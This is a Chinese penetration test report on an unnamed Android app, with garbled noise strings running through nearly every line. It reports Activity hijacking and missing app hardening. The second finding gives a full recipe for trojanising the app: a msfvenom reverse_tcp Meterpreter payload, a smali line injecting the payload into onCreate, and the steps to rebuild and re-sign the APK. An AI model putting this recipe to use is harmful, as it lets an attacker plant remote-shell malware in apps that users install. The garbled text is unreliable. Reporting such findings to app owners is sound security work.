- W( X, ~: I( h 0 X: z; W$ e, b6 k' \7 N
2 K$ J' \ v$ M( k H! @. Q $ F4 q9 |4 ^- @! r: y, X$ h

. R6 z3 v! L; g * \$ b) Y9 K! R9 J- L, G 文档编号： ) i ] y6 k: `$ H% V1 ?& v5 s ! t6 m; H) m9 q' m! c) N7 [

" o) t+ [/ \4 W9 F8 @% T& u# Q9 M1 l 5 D2 N& ]7 I, @ & N; D: {( W+ m$ H$ U . ]1 C" y8 F" C) b8 z# H

1 V! |( T8 A8 q9 g. l2 P) b" |& x8 ]4 }0 |0 i# k! W7 z # e# m6 G: N2 n . Z* g4 w/ u$ q! r

# t+ l; B. K/ n) w% W7 T: J " T) P1 N/ a' ] ! L/ c& `% P- Z0 I3 a7 J3 t4 P / Y# v/ J+ w5 ~: J

" B+ I; l( o. J k$ U 8 O, p! W. ^1 @+ J # P7 ]( j" ?' o6 {8 W0 u3 l ( E$ \# O- R% E7 T: Z. B

1 ~2 B8 ^" f. F8 d0 l6 r" `' l 0 e( ]# U1 L" P2 i4 j! I* i2 K+ i 0 K+ J4 e( Q, @% g9 E0 r1 p) }) w' ^$ N i( z0 A4 J) r9 o* X7 X

/ f0 q" ?* ~# x' z5 r; t1 h7 F5 X& h 某某某APP渗透测试 3 \ O+ G. X9 o: ?! ~ . _3 E& |6 @1 ^9 V

2 h/ D) B: W) f1 \9 H & l) m; N7 K6 f/ S ) p% T& M8 c. i" w) k; @6 a8 ^& I' \

. x# h1 M6 G$ A( Z0 w M o* D 4 d' m; ~: r- n- [9 z - \3 U3 p! ~( t }' S3 U

+ e7 M4 ~* d9 t * }0 w, P! v9 c8 K! p2 c3 L 9 V6 m3 s' Y$ \1 {3 D" ?4 z" H6 R, f- j: x* I

, o6 \) U; j1 g+ \ ! q8 z1 v# v& q, f8 j( E ! q8 B6 ^/ O- \! l9 n$ R* D , h: D5 x; T6 w9 K/ J

" @1 v ~/ m0 E7 c5 j* P1 J0 n 6 N% V- ]4 I W/ r* P7 w/ a 技术报告 8 g5 J m) A+ p 2 X+ h/ k H' S' S

8 z6 S& ^8 S3 c/ Y" s* w# v 6 K/ T( K# ]! @. \/ t( b 5 v) n. b I6 ^0 j. |# p. {2 v$ Y1 X; {. }) s6 r* e

6 s" s9 L9 `7 m- e4 y+ l, G" q: J5 O % Z& L0 m3 [4 ~, u' @( s8 t; m & t) y/ _( a/ K/ m1 ?; j2 U

6 T) s" T. c! s) N+ ]: I 2 P4 I' E/ F5 n+ o6 Z9 I 6 R- F/ x) H. E0 j/ \& M 9 d6 w9 `4 W o$ H

0 m" F. N3 w2 V* ^4 V) F! ?- W$ U& u 2 u5 `0 Z1 `& K6 |4 A5 u7 T $ q% ?! i3 n# }! a5 P6 [" D5 i

" r( r) ?* n/ O* e( ?$ S, i. n 8 W( k6 r+ Z% S, X& d ; t# v0 ?6 h$ P - G. O% s( S( P: F

) y$ V6 P7 } ]" q % d @6 X; X. z* p, \- T* f: f 1 \- ] d* @8 a+ I0 h/ l 4 H0 ]$ ^0 `) v

7 I2 `6 ^1 A" Z 2 i; c" m6 y* f3 ^4 O ( F% o' ~+ P' I. V# b; x' R% y4 }& r1 L' w, _: O \' {

: m. I; R3 d* v* X- T6 W6 } 1 Z, t. E9 K3 S% F* l " m: T) E5 p9 G' v; ^8 G' w' p9 E ; s5 z; i1 x8 w' s' c8 C5 W/ x

! c4 Q0 `0 Y8 [1 R, B0 u( g 6 S; Z( u8 p7 W. | ) @0 ?# X0 l& i' I" U e9 _/ l/ J0 f" ^

# w8 ?) g! a3 s% j # S/ p- {4 E: |9 o' H$ [. l 9 P/ z% Q6 `* F3 d' k 1 I( t9 [( d5 Z2 S" O8 D7 j

6 s% ^* h+ B5 j# g1 K( v 7 z8 ^2 O; U4 L 3 {4 T z5 h$ {! `. O$ n ; S& M; o6 d: q1 V! W; x

/ Q# i# ?0 Z2 k4 U: b1 X " v! `7 \. e: _# Y* B$ @4 c7 E * _4 q. M! D# A( i- G; G p- k4 H- r" a& I2 C! ^- B6 A$ j' k

% S: x3 X4 i8 f: v6 w: z' b% ?- @! i 7 `, R9 z9 X- Q d ! P H( M8 Q r2 T3 J9 B; b % Y2 I" r8 G% Z: f7 r

" a5 f2 i2 O( n3 c& V " m4 u0 i. q' O: U / v9 `8 e& M& Y3 \$ e; t m4 V, w; P( {0 p9 D& h& u

7 H! H, C$ K1 H9 v4 e4 y, [; R2 @ 1 q$ v1 P; {1 t! A+ { E/ F* [" A! j* l: t* l3 `; s' }3 f3 ? @: a0 @' r3 d

O) W/ U7 m& S+ }$ s% V % h. T! {: v: l3 W ; u( v+ @0 D+ A2 u1 l' ^ : d: ~2 u" \% F- B: O" [( M; q* p: ^' y# {

* e1 K$ f9 s& S' \- x0 | & X: ~& h' E% d% l1 \# ]# ?' X 6 t, }+ [/ s$ E. F* y! n B- ?; [! O

: c4 H8 L; W: M4 W6 O: ~/ o9 w- o6 i* u; J* n5 m 5 P7 T& p; p4 C* }# e! Q7 R$ f

, O! L, x! a$ `/ h; |4 u1 ~6 D! u9 T7 U. `, i4 | 二〇二〇年 9 _; c& u0 O, A; ]/ q7 U6 [: g # O% Y" @& u8 x6 B

" a. H. y* l. @: V! Q3 ]/ d, h8 O' m# t/ ?( O# a7 f 目录 . ^8 p) M r% O3 B$ \8 w* [, |: N$ a

1 t6 _/ ` T: _$ l& f* u e0 b! D& m- O: Y( | . g3 g" D6 c; U9 v0 Q+ B) }/ U. Q3 ^7 l. x v

9 V( j$ S! X, h, z, u # t' n/ ]! H" t( i1 `: P( R 1 概述... 3 $ n# x& L( k: Y& D. D# x7 s# ^- z) P! k, L9 [* Y

- }* n0 G6 _" Q5 g' A 7 i/ z$ w7 ^# s 1.2测试时间... 3 4 z+ j% u2 Q ~/ }- p 1 |' ^ [& u& c. h4 k& e6 l

+ c8 D( F- l: u8 G) h w; @; `- y* ?& l) _0 F& p 1.3测试对象... 3 5 o) ]; m0 T N% V& v- Y , _3 C2 {/ _7 r8 V. N5 k7 d

0 Z$ u2 N; D5 W, A 3 a- z- s5 k+ q: `! w 1.4测试结果... 3 ' q, u6 c( G0 H2 c/ {1 r 3 f3 Y5 H, H& @2 G+ f; d

* C0 @8 k* W5 X3 F8 O. x* O% {4 {. D8 a4 [2 q: H 2 检测结果... 4 9 U, a) z! H" x1 y . s* d2 ?# C7 L

}; h$ I2 q0 `% x 4 i6 m. e; }# f. T( H/ \- q 2.1 某某某... 4 |! ^6 g) s8 D+ ]/ r 8 z- z8 L1 E6 d

' |' J* ^+ \ j& H) o9 \' q3 L& r . |8 f7 ^0 N' r* Z$ k' r6 g" y 2.1.1检测目标... 4 + W G4 @. a& {) t) K8 q $ K6 u: D, n. g ]4 b/ t' i

5 g& u& W7 M4 b * Z9 U+ f/ g6 |7 l G8 C( g 2.1.2检测结果... 4 " `+ K$ t" ^, `( \( a 1 \; |; K5 x4 r' O/ _- `: S1 E" C

5 B3 ?: V: @3 O. V 4 F# |8 j$ l) c- b. A 2.1.2.1. 4 * x/ f" {) Q4 g1 F* z 3 f1 z8 g3 p# q4 r2 c

' N: G; `0 c. |/ O& w: z/ i `2 r6 q% a" L 2.1.2.2. 6 1 }7 k }; i- `* L; J9 Y2 l3 _6 @+ I6 s, z3 J

0 E9 P+ F7 U1 P. j/ p 4 I2 Z n; O5 _5 b3 y ) O% o$ L# b3 s l7 @7 x. s8 ^ $ h- ]6 H& N0 H8 x

3 c; H! F% I0 W* O. ` . s8 \2 y# Z% B, E' | 1 概述 T+ G7 D) I1 a6 b; L4 w# B 6 @3 h& d4 Q; y# ]

8 g( ~; Y9 j5 y' @ D2 C9 J8 [4 v6 h- x& @% ? 1.2测试时间 5 y; {3 R7 l' A3 [" W # n: I% s& O, e6 C

7 d, T/ G5 s: {" _. Z* I: R7 M e2 f 6 _% T" R( \|% J- F8 i 1 T$ w& m; N4 Q# e; }% }1 r# v# E 渗透测试时间 5 J* m7 k; D7 l4 ^ 6 ]% W0 k1 m2 U8 a) h; r0 Y* p" r/ X ' D; K8 b" x1 u2 i * T5 r( t0 Q; b9 g- y. a
6 K, o# k) w' f" r1 D. M5 { ! W+ N+ n$ z* K. N8 H& y5 E# K 1 c3 _- \' }1 I/ \ S' I 0 n) _- q& w: }4 D3 R 起始时间 ! q f; ~0 }, v8 X; g, Z 9 O, W. b ?$ T( ^ , w- w# Q v, x & w" {7 x( N; r6 e( C3 L, ?. L	2 f" n; I5 J% D 8 A4 i9 F. ~$ x; o5 Z. U8 c: K 0 `; j& X4 g- j/ j 2 m& i9 e/ H4 @ 2020年4月6日 % O1 k4 o" U% t: P P3 x1 S4 y n1 [( o* y3 a9 \ 4 S* x; o% E8 `. a5 l6 W' B8 \|# v, @9 [) ^! _- U: {; W( n
0 `& p0 J& ?, \|- T+ x # E0 L H8 o# \) b- h1 x 6 x0 h6 V% O1 ~% k- U" `, K- e1 y* \ # Y6 S9 \|! a8 e/ Z7 c3 D& T 结束时间 2 L/ \|2 d- O6 G1 T$ A0 a& I8 v0 n9 ^ + \|; k% s4 Y9 q" U' { % y* t9 }* H; L7 K5 a0 I 0 T3 N- \0 b/ t	1 v# r, \3 A2 E- {2 {/ y7 K& ~5 j) l! R) O# j5 U' M+ C/ X$ ~ ( m8 ~6 C. t% V0 m$ G9 X! D3 U : { m( s6 Q/ _ S' ] 2020年4月9日 6 y+ Q: k W7 } 6 R: J9 S- y6 l0 y/ x% A2 x) B h9 L4 o# Z% L3 { Z, R' X * Y& O K( g6 E5 i! v* ^5 T' p/ U

~" Y; _ }" J1 d3 k2 ^% ~: M! d3 d 1.3测试对象 # P. L; Z1 `0 w- }- b/ x ; V0 M4 e8 X! _0 A f& J

F- X8 }2 g s; c0 ^4 W, B 1 J) v% z( [6 e b9 m) d9 \ 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ) [9 U* V/ ~1 Q3 t+ ]6 c5 m0 ^0 w- T/ D7 Z

& z- M& W" \6 |6 Y9 @ 7 I b4 A4 H* x4 r- [ ? 表1-1 检测对象 # A" ]% @% B8 N' g9 ] - e- { m; b; p* ~+ c

/ o8 h5 p! a( {9 o' C; \|5 K/ n 4 U% O5 z& {. L1 W& G; ^ 6 f. ?( a ?( h$ @! \|0 R9 x: A0 P% k4 Z" W 序号 # S6 ^/ M$ l3 z& X+ q/ Q3 f2 q 0 B# l9 x$ b* `4 A % R. X; S5 M: s	# _) f& H+ z, e0 O. q. @1 @+ Z- v3 x / \( b; q9 e; J1 u7 b2 M # l* _- ~7 \' c" h4 B% I1 s 测试对象 7 L# b& {! a! S 9 l1 G+ G, Z/ x$ T7 S+ R2 n " i" C7 h/ z- U M9 i T4 O) \|& v! M. y. L$ A% A	. s# s- u9 D$ f! F0 [ 0 u) \|) \& m& b' q" Q 9 ^' I8 ]2 X3 z; W& K7 Z# h ( L. Y: a8 \|- Z5 O3 W 测试地址 4 A( \* z: U3 F( H " B" W3 q: v4 c! A+ u ' {. N# }; U- y. x* o( X5 s6 y9 U6 k3 G# n; N	& S9 U- F5 @$ p7 K6 y2 b: O 6 r7 F* F: X4 z+ W" c( j ( _6 W- b7 \. T! e& R3 ]" K" \5 x9 } 1 e5 V& @, Y9 I' l6 o9 _ 安全漏洞 $ q9 O/ n- D% Z [- \|) r I" g7 `: U+ F( s8 r2 b8 y; l 5 i! G- l5 j/ [ & _# D5 w) q3 Y
" T. l* j/ n& ?- F+ s$ l1 o: l* P! p: e. Q0 q" u ' v/ u( b8 H' w8 p/ @/ T 2 @) u8 \2 q5 C" ] 1 # f7 j2 ]4 M! u$ _+ o 6 P% f p; C# E : ?9 k1 O V; N. d ' w; N2 a" B8 k5 ~+ X: ^- @	: M1 r. ^7 S# H$ w 8 i3 X5 n/ X8 Y/ M ) W+ g+ ?: h8 ~# ^ 9 F/ ]! ?3 a3 f6 v$ F1 b" ~: w 某某某安卓APP 1 T) p C8 [4 D- J6 \1 Y5 C/ v9 f1 B3 w' v: w1 r # N% G' t) P U U/ O c/ r " L! J, d3 c( j	: L" W% l$ o- {. p 2 m2 y+ q3 Z1 O# G ) m# V5 _, E+ p( L2 x0 x2 x* l$ T- D6 }4 P! H3 A; K ) D) ~# I) P: V! D! ^1 R4 e! k9 Y0 q ! T: Z8 v8 n' s- e7 ` ; H& s7 A, G& T) v % @1 R( @. z* j! \|3 n	: {, f; [$ w6 ]# ~ . M1 ?9 D/ R# q7 h" L4 k Y1 f: R6 b4 Q% M" Z- m3 N* _5 w! X" }- P7 }( ?: F& C" B" _ 2 ! V; s& v4 o- Q' L) a % s1 I& a' n; l0 L8 P7 m( ~2 s6 l3 I* n . _% M. o& K- o6 [; m% a+ l3 i# n. z9 M # d. `8 u- ?4 r t

; [3 U. u& ]/ }: v8 R) }9 E * X' v: j& R( l! M$ T% _ 1.4测试结果 $ _( K0 o4 p, m ' u- O+ X/ u8 N( w6 M3 W+ ^* l

7 I; z$ n2 y* K' F! k 5 h! Q2 W! I; U3 h! P% h 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 8 U& E6 Z% e0 i C : _4 B2 B! G' f) t

; v' ^6 G+ {; |! h Q7 H( M+ c6 I; @% G3 |4 j $ Q( ]7 W' u# @ ( N# B( d, T0 ]9 ?4 j& Q

+ f# ^7 z' j* p6 t) Q$ O( S2 Q # x- c+ `. \" T- }4 I 序号 6 s& m2 P# ?; P ( U: w6 z5 E% `( C5 ^- K9 A: W1 i

9 g% e* ?$ P. N4 S- T, f1 K9 S) q- a, P 系统名称 5 T8 z# \6 |+ G * N) F0 [" q! s) S7 C6 w

6 ^+ R6 s- B8 N8 E* p# e / k5 r, p5 t/ a& ~ 漏洞名称 - j8 \8 c" b3 H. Y 4 P) Z9 D; x% ^) R' [. b

n1 W8 \ D; K$ V' z 4 I) H0 D) K, y3 i' P' C2 @/ [ 漏洞危害 % d% h% o4 |) G% a* A+ P5 V& ~6 q7 O6 _' @8 O+ b+ [

r) S" O% J! p" e 2 X5 @2 R2 W# R" @/ E6 q1 B 修复结果 + }4 J6 Q% @( S8 { 1 J+ u2 H( P* F1 e# d0 M

9 I+ U) m6 y R ; ]8 L. U" t8 [* Q+ I 1 - ]' d0 P0 H. ^& k) p; Q m % L9 W4 T/ r3 ?2 p

7 u+ n* }8 ]4 \# i . N$ z; v- q! z' y 某某某某某某APP " G+ x0 z4 j; p% y o' l# P- K) R( R# @7 p P4 Y

, }% Q/ A% ?* k) c7 a$ g% Q3 k$ {% b5 c' v0 h Activity 劫持 4 U d& Q0 {- `) P' j: \. B8 ~8 r6 W: L! ? L8 |$ @

0 m Y& i- [8 R7 J: Z6 k3 U9 O' }2 q+ x& T/ x 5 Q2 `" R2 X& c& m1 S- x ) o/ l a( m7 ^4 k

# d2 P7 i% {( l W 7 [8 {' y( p J 高 2 r5 i/ T. @# H, `" E, u: ^) H' q5 D : X& O2 ?* L# p8 C; Y$ r, `. p

9 v, e7 Z$ I3 c 1 r7 |( n/ F7 {. m- I9 I. c4 X) _ 5 s' W1 N" {, p' ^* Y! h ; Y( j2 @ A) Y2 `$ C+ @6 N

4 \' k* N0 [* A4 [ . q% q/ Q: ]: `- A; @ b 2 2 n# n4 z( T6 G9 e# L; H * \* i$ u% d: d1 O; g

. y8 i; o0 {" }, k2 v( L1 z% \3 ~! D/ E2 X5 v 某某某某某某APP ( I# n$ |4 ?+ U6 [$ t % |# _3 e: t9 r# n7 O

& d5 t, |( N" ~! d3 g# F( Q0 H3 e4 N0 z+ f9 _4 J 反编译二次打包捆绑木马、篡改APP代码 6 e1 M- o& k; ~9 L& h: k6 s4 w' A9 _ A: I) T5 F6 J3 Q

6 W6 G3 V: c( W9 @+ f/ d1 X: q" h$ r . n3 r, _% U1 B5 V9 E! j 高 $ |5 y$ W# E8 S' O ) A; Q. l# ~* P

0 s' i, H& S2 i: N" w- x' R3 O% C% k, E1 T- P! s" y + I3 E3 k! Z9 A1 K% Y& t2 `3 m* w: v# t5 ^7 [( ]* o- ?# u+ x! ~6 E

; i. T' R6 F% k3 j) { 4 a) g) J8 z) N5 m9 g3 K/ c$ K F% Y: Q) x- C8 L! h4 q6 r( I; C) S/ i, X0 o% G" K

* D+ W) [9 Z& r1 ~1 N1 r% V 1 |5 O+ h" t b, u+ [ V% A: c 表1-2 测试结果 - C7 U, O: Z2 Q2 K, v( \% |5 s + H$ {( \# {/ Y: p. K

3 u: A) D, ?; p: x$ f) F% S7 o9 s" z: R, r3 H - m1 w1 H5 L2 s* ?& R' e5 ] # @) d0 H! S7 a

" K+ V$ F) U. k. ?( M' v! Y4 P5 E5 b+ e# U P( x1 f- L 2 检测结果 # U7 }; P& ^& K& W; n. K1 U& W' l! ?0 L* j* u

, W; d- E9 v: \6 I4 D 5 I9 h* F7 Z" V! W6 l1 |, { 2.1 某某某 5 i) g' e. F! D( _4 K4 ?; z& h3 K: q6 j* V- s/ C9 M7 g

& P- k; T: I1 B% g5 J3 a# \& m- ^; V 2.1.1检测目标 0 o8 B/ M/ e& X# W n3 Y/ C J( q7 s s0 u! L

/ E8 h$ d& W; c7 j" x( I% _. M3 u, o % Q# k) I5 c$ s# i7 A0 T& W 目标地址： 某某某某某某APP 2 N) w9 r% c7 k8 E: _5 G " f9 C% Y7 s1 \8 x! L

3 d2 y- S S2 ]) t+ Z6 c# x! y3 C- k 2.1.2检测结果 ) K# r4 H; E) S9 G% [1 s% g# v' g4 ^% U. U( k8 w' s" n

2 R, j" q2 C9 u+ b( w / `0 g2 z3 S _$ o* x 2.1.2.1 * g& p6 A. [8 |4 N " Y( f, P E l6 I

. x Z/ A& _4 p4 K- j0 l9 R 7 m! c; k+ C0 [3 ]( j 漏洞链接地址：某某某某某某APP 9 a/ |2 j( g. D6 y8 }4 q, ]3 S% h$ P: H( C' D: V, ^/ {4 b

4 h% W" r! R( D# O, }( N( w7 a9 r" ?: j3 W" ? 5 _* ?! B; ?* Q4 f8 K) ~% M . O7 A/ J! E2 {9 A, ^( ?) u$ O/ P

. I: Q) G6 k+ V$ |6 ?6 z4 M! _8 o2 ~, P2 ? 漏洞分析及取证： / [4 f/ B7 `& B5 D" z ) _/ f0 F% t6 A( e" k l

+ m' [/ S. ]& J" K1 j : k* K- ?" J, h" ^5 W8 m- Q; J 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： , E$ @1 f( y2 U9 S7 R& x6 E 0 Y- s9 [! b7 w4 O; g( P

$ r4 `& [( h( h: V2 L0 X ; y# H5 v. [* _/ o1 E3 t# U% Y $ ]. S5 s& r! r: d 2 c# g: |% N8 e' d P1 B" P2 W

* Z' B& Y0 r' a& j # ^: r9 x1 D1 T1 m1 {+ z - n/ X- B- h+ g. k- A. {$ _/ t - w. {* ~- U7 ]

. g, p% F- I# R) X5 e 8 t4 g2 H. B8 L; h 8 [% F% \$ Q$ u4 r9 `2 A, S2 s

" J2 D' D {2 s% y3 C* D/ j9 @ 8 @; Q. m, ^( g) T/ ~ % T. h$ V- b2 a0 o4 ^. U. E : X; h- U# m( s

" |/ Y) N2 Z: X ' H6 Q2 c! x/ @" [) r( W- ~- s- V : P( @+ |1 w* Y- f, h! V. y8 w# }. a+ Y$ L n7 c

3 i* M+ z8 m6 A3 i- L # O# I+ b, I/ d8 J9 S4 Y' y' F 漏洞危害：高 ) d& D4 J) [& y$ B3 z1 |: N& z1 @1 U H. v' w) k6 w( n# e$ T

: R6 a3 d; p W# d 9 r: I1 p% ?. M8 e/ F' Z6 w4 s # `4 b' w& G& X6 L7 u$ v - W1 r; `/ w. [3 h C 严重程度 / E0 X$ z$ G2 h 3 W G4 d, H& \|0 U1 ^; p 8 S+ J! V# R6 Q1 H 5 O* a. S. h l: f$ D0 ?0 j	# ~+ p9 C3 x* l, ]# g9 @2 F $ E2 \) w8 [9 a" i ! S6 [4 ^5 y1 i2 k+ \| ; [/ ?+ P( q2 O; z$ H, G# Y 高 ! H+ _0 e/ X, ^( E" X1 @6 I! q/ }8 Y! Y/ ~ % \6 L1 y* Y+ }/ L3 n; G T 5 b0 t2 Y$ e4 F: n, {) e	6 X d: f% h) _* V " B& y! h( Q& W7 T/ L9 v, X6 P 8 W6 U: L' b. c9 F) M- o2 @) @: a# r" y1 W0 E6 U2 B ■ ! Y4 t, K( t: M- r; }$ R7 [9 o" I% O, c C / l. g9 O2 V9 T4 r8 z6 a 9 @8 N# ?( W$ y7 @& G	8 J7 T' T$ L s. v0 U+ C3 T3 }! Y8 _% _& @( A5 Z/ z+ b$ Z6 f8 Q * D9 {# B8 I0 ] , o, E5 {" x: d4 S, l 中 9 Y. F5 D( s$ F2 t: p0 H # Y. [ q1 v2 R. ?9 H& M P 7 h9 j3 L. w' {; F# d& {, F : E2 F4 y0 a8 f	R& N% T4 g* u ' i# o( B" i" N8 g' L4 N 0 ^) H6 ^, h4 I" L1 E& \ 7 ?3 ]- r3 P7 N% P / D f2 g- \: { e5 V8 J( x 7 ?6 I. m8 F# G7 i6 e/ C S3 t 6 t s4 n- h% M0 Y5 \* b ) Q5 s3 a6 g3 G6 ^8 T	8 v5 u# c4 T# \|5 s2 n 6 S6 o e' ?# S; v+ e 6 z5 c8 W# z& q% E 9 E( w" J: D1 e9 `% F3 u6 ~ 低 9 Z g3 l# {) _7 T4 R / F' q+ v P- ~) G% l: k4 J " @: q b/ x3 w8 K . x# }' R/ `- \+ s. d+ s	8 y7 S, x- ^7 \3 U( n8 Q9 d 2 R; z) v% r/ @ % ^0 y+ y* d$ U* m! K6 a 9 ?# M$ f8 h* A2 F. h$ Q7 T( T ) M0 i; D+ x/ S* r8 k( X, \| * A" d" V2 c% ? t1 f" n 2 q: D: ^ Y+ O3 e2 a) \: B& ~, z/ V/ N) P/ X

1 w* L" R) x; `7 W& R1 h4 e9 j/ Q6 h* r" p8 C' C * y2 M7 u6 {, ~, a# J + R, i. }7 B: M5 g, s8 ]

; R8 S! g7 C$ c. \) h& U+ U . `2 r5 S$ ?4 f7 i9 ~ 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 / I) y. v" f: c' h' J4 p0 I$ t: P; e+ |2 g& i. J E4 c' g

' W& W: Y9 Y% F- O 5 Y$ ~( s7 y- P0 K + i) \6 l- w9 U" Y4 J+ l" r1 z g$ T; N3 F2 C ], |/ R/ s

?# [7 ]: T* Y- y + _% Q8 ?. ~: o/ @3 U6 e0 M8 v % B$ a' f1 k/ @9 x * H# l5 U$ }( [; r+ x2 o1 F' n

) T* x G5 d" [0 w a! V! N' u+ p9 _; I4 f0 d 2.1.2.2 7 ^ R- z, F' @, I 2 W) P+ U+ ~& h1 z4 Y. Y

/ o5 V. p# i" x+ p 1 ~. n5 e5 Y* J( n9 K5 m' l 漏洞链接地址：某某某某某某APP & I* U4 K% c( P* H+ ^! l8 d7 } 2 e- \: }2 e: K( \. R

0 x& ~( e% j: R) }& d7 o: u3 g) `) \& k2 ~ 漏洞分析及取证： 3 n8 t7 M O6 ?2 q; A* A! S9 C7 i% T# E: f: z8 _, e

6 m, c* I: d9 q 3 P2 F/ E4 H4 u1 V% X4 r 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 1 }8 k/ A5 I5 [' w: g ( @, q1 C# ~6 @' r- Q4 t

0 V/ p( O. K9 f( b! v) j 0 X" Y# R/ {% F/ v 用Metasploit 生成木马 apk 8 `$ Q0 N# H4 d) V0 U* ^7 ~ S' J8 d; h% `

& B8 H8 [0 E" w- N3 ] 4 S! O$ u" O! c2 e0 R6 l msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / K3 R/ z. m) M% K, `9 y; J 2 l2 C9 K1 ] h+ N' N8 h

& G3 D) D: z4 Q/ q, c. S5 M; Z . K0 ~8 o4 h' ~4 w. a- T 反编译目标apk和木马apk $ c* _5 n+ q4 I5 D- k & D$ W0 q! a) b# m+ b

+ x* v* T; [) w8 R! N6 V$ ?6 [( { ( W0 E% A8 |- q7 J: _/ Q5 n apktool d target.apk
' g8 D3 L5 w* n' P3 O, s4 z 9 x- {6 Z6 D2 Q3 x apktool d cockhorse.apk 4 t6 s. P) v H$ Y7 E$ y 4 R. f4 m" D+ p+ k) W

_ z2 L# b. f( S% t, G7 s/ z- S0 i, ~& ?8 Z2 | M 木马 apk 注入目标 apk " C& u8 x+ f/ B) X0 k" q$ C5 d# l' R$ Q' _4 _' I+ Y

6 T, f8 R6 l6 X; }* ?9 I7 K# @: x+ D5 d- C5 X) u3 L 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
5 R2 B5 D' R$ S' F- |# H- ^' F+ F & U7 I' L+ _8 W# O( @/ N1 } invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ; R/ j& |% n3 k( n3 u* @2 j; b

\! g2 m' K% a$ n6 L7 g ) }" f/ R0 N& P 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 ) K, }/ e1 r+ v$ @6 R1 O, y1 U. O5 ?5 g7 T

J u( X1 B5 k {/ y, r& Q9 V5 e1 K 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 5 R3 R q" l0 Q0 }: G 7 p4 _4 s' ^, r

9 h( O, B3 V3 l D8 B7 @ ( j( H6 L/ d, s/ _ 回编译生成最终 apk ) V/ B1 R5 R3 a1 m3 R& p 5 O% j" Z/ S" W; [2 f \

' }2 g _8 b- |9 o( w( k ! V; C- I6 R5 Z+ j3 a8 r 重新打包 % y$ ^2 L8 _+ n. z2 b' i" i; U* N! q$ Q, V5 P& v

+ z" Z/ Y+ x1 q) ^3 z; p7 _ : o7 r1 ]& p9 J% W1 w" a apktool b -o repackage.apk target_app_floder # M* Q5 J3 p; ]$ q4 a 4 G9 o: \$ D0 T# q ^: c

. s" h; S" E: r- H# T4 }4 l, _ ' s9 @: L$ q8 w1 T0 N% {9 M+ {; y 创建签名文件，有的话可忽略此步骤 + i' q2 F9 k5 D) G- j. g " G$ V' [& P4 T" [6 n# L6 Q

) h! I* @" U2 s, I$ b8 @ ' Z3 e- c/ f! b( e2 u0 F keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 0 U9 `$ c0 g/ B" B / ]( b- s2 y2 T0 W

0 d2 g+ [/ I& v& O9 L5 f$ ^# M9 k- c U1 Q Z/ Y5 [2 | 签名，以下任选其一 + e( c+ M- B' v# E- ] {. H 2 p" f9 n" i+ c e; U/ Y- x

( ^" @0 |# \( \' v, R" U2 t' w: [ - w! `- o: J2 \; ~. s" X% @ jarsigner 方式 0 H6 R) x; O# R4 o& Q( [ - Y1 `% z2 [% @2 \% L L6 x/ D

2 y, v' u3 C# c2 D/ U( W \ ' X, e" y2 }1 {" k, ^ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 \! q2 B Y' O4 A, W' N% d6 g2 F0 T7 E: d& b& a

0 l7 U* j1 e# S% i, v7 T. S9 X# U( g' q- H) | apksigner 方式 / Y- a, a* w2 y, d# T( X( Y ( g6 D& u8 k9 b. ~) S

{1 |% Q! J3 z. i7 Z ! E; u- }0 q* P/ b' E+ L" d. [ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 h3 G) m5 Y# b% x' g7 l: e6 K/ i' i6 _

+ c9 W. R( w s/ j5 Q % h8 s+ f- Y, j( C* f 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 i% i& Z6 k. Q0 a8 {$ y; S ]7 t _ X8 \

; `0 S& F$ y& D" j; a- I 9 w8 S( K# E; Y 验证，以下任选其一 6 a2 K5 b' g9 z6 K" e: h0 V9 t% q/ s$ t6 y

+ l9 s2 J$ b& `9 d; X+ @ : R) l. @: g, J jarsigner方式 ( q) r9 C: o2 { 5 b# B$ S5 Y6 }+ K, C( }

8 e/ s- s1 {2 ]% K2 O 3 u3 s- l+ u4 B$ H! H4 ^, [" b" ]7 N jarsigner -verify repackaged.apk & H( Z! ^/ X1 i1 L7 L+ v& l e2 t& j2 o

( Q2 k0 h) g% z- I , I( N& E) `6 h* R1 L2 [& K apksigner 方式 % k; N. N; q0 |6 N / @0 C' P- u K2 D3 T

2 x0 R) Y" {6 c$ g u/ u: s% O8 P apksigner verify -v --print-certs repackaged.apk 0 K- |! {9 |* F9 h+ Y- m 6 |" `, T3 \6 P7 X

3 j: y5 C5 J7 B/ h2 g5 q & `3 {2 w2 d- }( Z keytool方式 3 d5 S; z/ P& D/ ~4 x" Q! R: n) o6 ]# ?/ z2 g2 a& Q

! y4 l4 ]0 Q. v+ u% S* ^! ^$ X2 h# x$ Z keytool -printcert -jarfile repackaged.apk 8 |5 }& A4 M1 M e7 c, o1 { - y, n7 q5 A$ f, T# j+ O

4 J" ?( j: E1 M; Z+ y8 |1 h n9 P% T4 { 对齐 & f" X' B3 ~0 l* t' m, U% b: Y/ ]: o, h1 B

! \- N C/ J7 ]- o8 O6 X3 W# K* `% y+ A 字节对齐优化 7 @4 m H4 g) e/ s, M# ` & k/ ?: t) |" p3 t, B7 Y

1 b9 m! T( t% s8 T' V3 [ / M# L' ?; M* A6 [' e+ ~6 ~ zipalign -v 4 repackaged.apk final.apk % g1 Q$ C( z5 R# f2 J5 s( s2 ~$ A o' U; M+ ?% [

